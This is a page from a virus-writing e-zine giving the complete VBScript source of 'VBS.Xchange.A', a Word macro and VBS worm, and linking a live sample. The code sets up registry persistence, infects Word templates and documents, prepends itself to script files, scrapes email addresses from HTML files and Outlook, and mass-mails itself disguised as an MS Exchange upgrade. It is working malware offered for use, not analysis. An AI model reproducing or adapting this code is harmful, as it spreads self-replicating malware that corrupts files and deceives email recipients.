<html>
<head>
<title>rRlf #2</title>
</head>
<body text="#ffffff" link="#58b3f6" vlink="#58b3f6" alink="#58b3f6" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Infiltration of a Nation</i>
<br><table cellpadding="9">
<tr>
<th><a href="05.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="07.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>VBS.Xchange.A by PetiK</u></b>
<p>A VBS/DOC infector coded in VBS. Here is the code:
<p>'VBS.Xchange.A
<br>On Error Resume Next
<br>Set fso=CreateObject("Scripting.FileSystemObject")
<br>Set ws=CreateObject("WScript.Shell")
<br>Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
<br>virus=fl.ReadAll
<br>fl.Close
<p>Set win=fso.GetSpecialFolder(0)
<br>fcopy=win&"\MSXchange.vbs"
<br>reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
<br>fso.GetFile(WScript.ScriptFullName).Copy(fcopy)
<br>ws.RegWrite reg&"\MsExchange",fcopy
<p>set sp=fso.CreateTextFile("C:\XChange.vba",True,8)
<br>sp.WriteLine "Attribute VB_Name = ""Xchange"""
<br>sp.WriteLine "Sub AutoOpen()"
<br>sp.WriteLine "On Error Resume Next"
<br>sp.WriteLine "e = """""
<p>For i=1 To len(virus)
<p>e=Mid(virus,i,1)
<br>e=Hex(Asc(e))
<p>If Len(e)=1 Then
<br>e="0"&e
<br>End If
<p>f=f+e
<br>If Len(f)=110 Then
<br>sp.WriteLine "e = e + """+f+""""
<br>f=""
<br>End If
<p>If Len(virus)-i = 0 Then
<br>sp.WriteLine "e = e + """+f+""""
<br>f=""
<br>End If
<p>Next
<p>sp.WriteLine "read=dec(e)"
<br>sp.WriteLine "Open ""C:\xchange.vbs"" For Output As #1"
<br>sp.WriteLine "Print #1, read"
<br>sp.WriteLine "Close #1"
<br>sp.WriteLine "Shell ""wscript C:\xchange.vbs"""
<br>sp.WriteLine "Call infect_fichier"
<br>sp.WriteLine "End Sub"
<br>sp.WriteLine ""
<br>sp.WriteLine "Sub HelpAbout()"
<br>sp.WriteLine "On Error Resume Next"
<br>sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""I-Worm.Xchange"""
<br>sp.WriteLine "End Sub"
<br>sp.WriteLine ""
<br>sp.WriteLine "Sub AutoClose()"
<br>sp.WriteLine "On Error Resume Next"
<br>sp.WriteLine "FileSystem.Kill ""C:\xchange.vbs"""
<br>sp.WriteLine "End Sub"
<br>sp.WriteLine ""
<br>sp.WriteLine "Sub infect_fichier()"
<br>sp.WriteLine "On Error Resume Next"
<br>sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents"
<br>sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents"
<br>sp.WriteLine "df = ""C:\XChange.vba"""
<br>sp.WriteLine "If nor.Item(""Xchange"").Name <> ""Xchange"" Then"
<br>sp.WriteLine "   doc(""Xchange"").Export df"
<br>sp.WriteLine "   nor.Import df"
<br>sp.WriteLine "End If"
<br>sp.WriteLine "If doc.Item(""Xchange"").Name <> ""Xchange"" Then"
<br>sp.WriteLine "   nor(""Xchange"").Export df"
<br>sp.WriteLine "   doc.Import df"
<br>sp.WriteLine "   ActiveDocument.Save"
<br>sp.WriteLine "End If"
<br>sp.WriteLine "End Sub"
<br>sp.WriteLine ""
<br>sp.WriteLine "Function dec(octe)"
<br>sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
<br>sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
<br>sp.WriteLine "Next"
<br>sp.WriteLine "End Function"
<br>sp.Close
<p>infvbs(win)
<br>infvbs(fso.GetSpecialFolder(1))
<p>SendWithOutlook()
<p>Set wd=CreateObject("Word.Application")
<p>If ws.RegRead ("HKLM\Software\Microsoft\MsXchange") <> "Coded by PetiK (c)2002" then
<br>CN = CreateObject("WScript.NetWork").ComputerName
<br>Set srch=wd.Application.FileSearch
<br>srch.Lookin = "C:\": srch.SearchSubFolders = True: srch.FileName="*.doc;*.dot":
<br>srch.Execute
<br>Set sp=fso.OpenTextFile(fcopy,8)
<br>sp.WriteLine "'On "&date& " at "&time&" from "&CN
<br>sp.WriteLine "'Number of DOC and DOT file found : "& srch.FoundFiles.Count
<br>sp.WriteBlankLines(1)
<br>sp.Close
<br>ws.RegWrite "HKLM\Software\Microsoft\MsXchange","Coded by PetiK (c)2002"
<br>End If
<p>Set vba=wd.NormalTemplate.VBProject.VBComponents
<br>If vba.Item("Xchange").Name <> "Xchange" Then
<br>&nbsp;&nbsp;&nbsp;vba.Import "C:\XChange.vba"
<br>&nbsp;&nbsp;&nbsp;wd.Application.NormalTemplate.Save
<br>&nbsp;&nbsp;&nbsp;End If
<br>wd.Application.NormalTemplate.Close
<br>wd.Application.Quit
<p>Set mel=fso.CreateTextFile(win&"\kitep.wab.txt",8,TRUE)
<br>counter=0
<br>lect()
<br>mel.WriteLine "#"
<br>mel.Close
<br>WScript.Quit
<p>Sub lect()
<br>On Error Resume Next
<br>Set dr=fso.Drives
<br>For Each d in dr
<br>If d.DriveType=2 or d.DriveType=3 Then
<br>list(d.path&"\")
<br>End If
<br>Next
<br>End Sub
<p>Sub spreadmailto(dir)
<br>On Error Resume Next
<br>Set fso=CreateObject("Scripting.FileSystemObject")
<br>Set f=fso.GetFolder(dir)
<br>Set cf=f.Files
<br>For Each fil in cf
<br>ext=fso.GetExtensionName(fil.path)
<br>ext=lcase(ext)
<br>if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
<p>set htm=fso.OpenTextFile(fil.path,1)
<br>verif=True
<br>allhtm=htm.ReadAll()
<br>htm.Close
<br>For ml=1 To Len(allhtm)
<br>count=0
<br>If Mid(allhtm,ml,7) = "mailto:" Then
<br>counter=counter+1
<br>mlto=""
<br>Do While Mid(allhtm,ml+6+count,1) <> """"
<br>count=count+1
<br>mlto = mlto + Mid(allhtm,ml+6+count,1)
<br>loop
<br>mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
<p>sendmailto(left(mlto,len(mlto)-1))
<p>End If
<p>Next
<p>End If
<br>Next
<br>End Sub
<p>Sub list(dir)
<br>On Error Resume Next
<br>Set f=fso.GetFolder(dir)
<br>Set ssf=f.SubFolders
<br>For Each fil in ssf
<br>spreadmailto(fil.path)
<br>list(fil.path)
<br>Next
<br>End Sub
<br>&nbsp;
<br>&nbsp;
<br>Sub sendmailto(email)
<br>Set out=CreateObject("Outlook.Application")
<br>Set mailmelto=out.CreateItem(0)
<br>mailmelto.To email
<br>mailmelto.Subject "Upgrade Ms Exchange"
<br>mailmelto.Body "Run this attached file to upgrade Ms Exchange"
<br>mailmelto.Attachment.Add (WScript.ScriptFullName)
<br>mailmelto.DeleteAfterSubmit = True
<br>mailmelto.Send
<br>Set out = Nothing
<br>End Sub
<p>Sub SendWithOutlook()
<br>Set A=CreateObject("Outlook.Application")
<br>Set B=A.GetNameSpace("MAPI")
<br>For Each C In B.AddressLists
<br>If C.AddressEntries.Count <> 0 Then
<br>For D=1 To C.AddressEntries.count
<br>Set E=C.AddressEntries(D)
<br>Set F=A.CreateItem(0)
<br>F.To=E.Address
<br>F.Subject="Update and upgrade MS Exchange."
<br>F.Body="run this attached file to update Ms Exchange. See you soon."
<br>Set G=CreateObject("Scripting.FileSystemObject")
<br>F.Attachments.Add(fcopy)
<br>F.DeleteAfterSubmit=True
<br>If F.To <> "" Then
<br>F.Send
<br>End If
<br>Next
<br>End If
<br>Next
<br>End Sub
<p>Function infvbs(Folder)
<br>If f.FolderExists(Folder) then
<p>For each P in f.GetFolder(Folder).Files
<br>ext=f.GetExtensionName(P.Name)
<br>If ext="vbs" or ext="vbe" Then
<br>Set VF=f.OpenTextFile(P.path, 1)
<br>mark=VF.Read(14)
<br>VF.Close
<p>If mark <> "'VBS.Xchange.A" Then
<br>Set VF=f.OpenTextFile(P.path, 1)
<br>VC=VF.ReadAll
<br>VF.Close
<br>VCd=virus & VC
<br>Set VF=f.OpenTextFile(P.path,2,True)
<br>VF.Write VCd
<br>VF.Close
<br>End If
<p>End If
<br>Next
<p>End If
<br>End Function
<p><a href="06.zip">living virus</a>
</body>
</html>
